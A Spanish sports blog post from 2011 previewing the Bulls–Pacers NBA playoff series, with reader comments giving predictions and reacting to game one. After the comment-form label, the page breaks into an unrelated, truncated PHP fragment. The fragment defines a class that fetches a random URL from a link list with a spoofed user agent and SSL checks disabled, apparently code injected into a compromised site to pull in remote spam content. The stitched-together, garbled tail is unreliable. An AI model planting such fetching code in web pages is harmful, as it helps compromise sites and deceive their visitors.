Análisis Chicago Bulls vs Indiana Pacers

13 de April de 2011 por TheDeerHunter

Regular: 3-1 para Bulls.

Bulls: 98.6 PF – 91.3 PC (+7.3)
Pacers: 100.1 PF – 101 PC (-0.9)

En una esquina del cuadrilátero, con calzón rojo, ¡los primeros contra pronóstico de la conferencia Este! ¡El equipo más en forma de la liga! !Uno de los más regulares gracias a una de las mejores defensas y al juego interior más completo de toda la conferencia (2º mejores reboteadores de la liga)! !Con posiblemente el mejor entrenador del año y el MVP en su filas!

En la esquina opuesta, con calzón amarillo, !el único equipo con balance negativo de toda la postemporada! !Una de las peores defensas de entre todos los supervivientes! ¡Un equipo que ha sufrido cambio de entrenador a mitad de curso y al que apenas les hemos visto en una ocasión amasar cuatro victorias seguidas! ¡Un equipo que no tiene recorrido real a través de las eliminatorias!

A priori, se trata del cruce  más desequilibrado del cuadro. Llegados a este punto da la sensación de que los Pacers no han terminado de pulir totalmente su rotación mientras que los Bulls, en cambio, parecen estar cada día que pasa más afinados. Se espera una eliminatoria cómoda a favor del equipo de Chicago.

Claves de la eliminatoria:

Marcaje sobre Derrick Rose: La primera dificultad que debería resolver Vogel para tener alguna opción es impedir que el MVP se sienta cómodo. Durante la regular no lo logró y Rose les hizo polvo promediando ante ellos 27 puntos por partido, casi 6 rebotes y 6.5 asistencias. Entre las virtudes de Darren Collison no está la de ser un perro de presa y los sistemas defensivos de Indiana tampoco son  lo que se dice infranqueables. Rose lo sabe hacer muy bien frente marcajes múltiples e incluso tiene experiencia internacional frente a zonas de las de verdad.

Las alas: Luol Deng ha sido un jugador importantísimo para los Bulls este curso en ambos lados de la cancha. Su fama de irregular no se ha notado, pero Vogel cuenta en el perímetro con un amplio abanico de opciones de calidad. Granger, George, Dunleavy, Rush… son posiblemente la mejor baza que pueden jugar los Pacers.

La lucha por el rebote: Estamos hablando de dos de los mejores equipos reboteadores del campeonato. Muchas eliminatorias se resuelven mediante este detalle. Si asumimos un hipotético empate entre una torre como Hibbert y un gladiador como Noah (que ninguno de los dos lo ha pasado bien frente a frente) se puede pensar que todo se resolverá entre Boozer y Tyler Hansbrough. Boozer tiene más experiencia y les ha hecho mucho daño este curso, pero Hansbrough es uno de esos jugadores que se crece conforme más complicado lo tiene.

Pronóstico: 4-1 para Bulls.

Comenta

20 comentarios a esta entrada

  1. Javijaen dice:
    #1

    No apuesto ni por una victoria de Indiana. 4-0 comodísimo para Bulls. Rose no tendrá freno y Boozer-Noah son muy poderosos con lo que con Hibbert y ayuda habrá más o menos empate. Si Deng tira triples, entonces Bogans también ¿A cuál frenar? Bulls tiene muchos más argumentos, y hasta que llegue Magic (presumiblemente) no debe de tener muchos problemas. Pronto lo veremos…

      Citar

  2. troll dice:
    #2

    4-0

      Citar

  3. JorgeA dice:
    #3

    un 4-0 bastante claro veo a estos BULLS en la final d conferencia! derick rose es un abuso y va a pasar por encima de los Pacers…

      Citar

  4. Scriers dice:
    #4

    4 1
    Los Bulls notarán el aliento del conseco pero cuando se descubra la verdad, los Bulls seràn demasiao!

      Citar

  5. busky23 dice:
    #5

    Siempre Rose!!!,12 años después vuelvo a disfrutar con los toros de Chicago 4-0

      Citar

  6. Ru dice:
    #6

    Los Bulls son un e

      Citar

  7. Ru dice:
    #7

    Los Bulls son un equipo demasiado serio como para que se produzca una sorpresa en primera ronda.Para que los Pacers ganaran algún partido Granger debería tener una actuación excelsa toda vez que dudo que Hibbert sea un factor desequlibrante ante Booser-Noah,y si esto pasa la combinación Rose+Deng igualaría lo que hiciera Granger.El 4-0 parece bastabte evidente.

      Citar

  8. Denise dice:
    #8

    4-0 sin compasión.

      Citar

  9. Len Bias dice:
    #9

    La inexperiencia de Bulls hará que pierdan un partido, 4-1

    Con lo de inexperiencia no digo que no puedan llegar lejos por eso, si no que al principio a lo mejor se ponen algo nerviosos, se asustan o se dejan llevar y pueden ceder un partido frente a Indiana.

      Citar

  10. jas dice:
    #10

    we believe!!! pasa indiana en una serie de 7 partidos jajajaja no me lo creo ni yo

      Citar

  11. Txusma dice:
    #11

    Más inexperiencia tiene Indiana. 4-0 y a descansar pensando en Orlando. Go Bulls!

      Citar

  12. TheDeerHunter dice:
    #12

    Horario de los 4 primeros partidos:
    Chicago:
    #1: Sábado 16/4 20h (españa) < -- Buena hora!! #2: Lunes 18/4 3:30h -------------------------------------- Indianápolis: #1: Jueves 21/4 1h #2: Sábado 23/4 22:30h Los de Indiana también se pueden ver los dos...

      Citar

  • Sancho88 dice:
    #13

    El 4-0 también es mi pronóstico. Por cierto, al ver 3-1 en el pronóstico oficial creía que habían puesto la primera ronda a cinco partidos. Pero veo que solo era una errata.

    Muy poquito que añadir a lo que todos habéis dicho. Indiana tiene el mérito de ser un equipo alegre y sin complejos, pero para entretener en temporada regular, nada más. Playoffs es territorio vedado para estos chicos. Se necesita justo lo que habéis comentado, experiencia para saber resolver cualquier trampa especial que te haya preparado el rival para estos partidos, mucha defensa, y por supuesto talento ofensivo. Los Bulls tienen todo eso e Indiana solamente talento. Seguramente veamos partidos muy desequilibrados en el UC, que se resolverán por más de 20 puntos a favor de Chicago, y en el Conseco… habrá algún partido más igualado, pero vamos, no creo que le pueda dar ni siquiera una sorpresa.

    Pd: debería estar prohibido entrar con 37 victorias de 82 posibles en una postemporada… esto solo se podría arreglar dándole mayor premio al campeón de la temporada regular, metiéndole directamene en finales de conferencia, y después, del segundo al quinto que se jugaran cuartos y semis para llegar a esa final.

    Pd 2: esto yo lo aplciaría en el Este solo. El Oeste está bien así. Los osetes incluso le darán grandes doloroes de cabeza a las espuelas, pero eso sera en otro episodio

      Citar

  • German dice:
    #14

    No descubro nada diciendo que es la serie mas desnivelada de todas, 4-0 los Bulls del MVP Rose

      Citar

  • Jona dice:
    #15

    Parece que ahora no esta tan claro yo creo en indiana jugadores muy compeltos y centrados son muy buenos.
    Me encanta Tyler

      Citar

  • Denise dice:
    #16

    Pues de momento un buen ZAS en toda la boca para todo el blog porque los Pacers están llevando la inciativa en el primer partido. Quizás, acabe ganando los Bulls, pero creo que nadie se esperaba que los Pacers lleven ahora mismo 36 minutos dandole un buen meneo a los Bulls en su casa y jugandole de tú a tú.

      Citar

  • HeiNeKeN dice:
    #17

    Hansbrough esta haciendo un traje a los Bulls, que crack el tio

      Citar

  • German dice:
    #18

    Un parcial de 14-1 en poco menos de 3 minutos le dan la ventaja a los Bulls por 3, como tiraron por la borda todo el esfuerzo de 44 minutos los Pacers!

      Citar

  • Denise dice:
    #19

    Si, vaya manera de cagarla de los Pacers, que a falta de 3 minutos ganaban 98-88, y a partir de ahí, han plantado un pino en medio del United Center (que debería pasar a llamarse “Rose Garden”), y han encajado un 14-1 que obviamente le ha hecho perder.
    Y ahora, después de este mazazo anímico y moral, creo que se van a llevar una buena paliza en el proximo encuentro y un buen 4-0 al final.
    Adios al Zas.

      Citar

  • sergio dice:
    #20

    Desde luego Denise, ese nombre sería acertado para la cancha de los Bulls… si no fuese porque ya es el nombre del pabellón de los TrailBlazers jajaja.

    Y estoy de acuerdo contigo en tu lectura del partido. No veo a los Pacers ahora más cerca de hacer daño a los Bulls. Los veo más lejos. Si no han conseguido ganar un partido que han ido dominando durante 44 min, no sé como reaccionarán ante un buen partido de los de Illinois.

      Citar

  • Deja un comentario

    html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>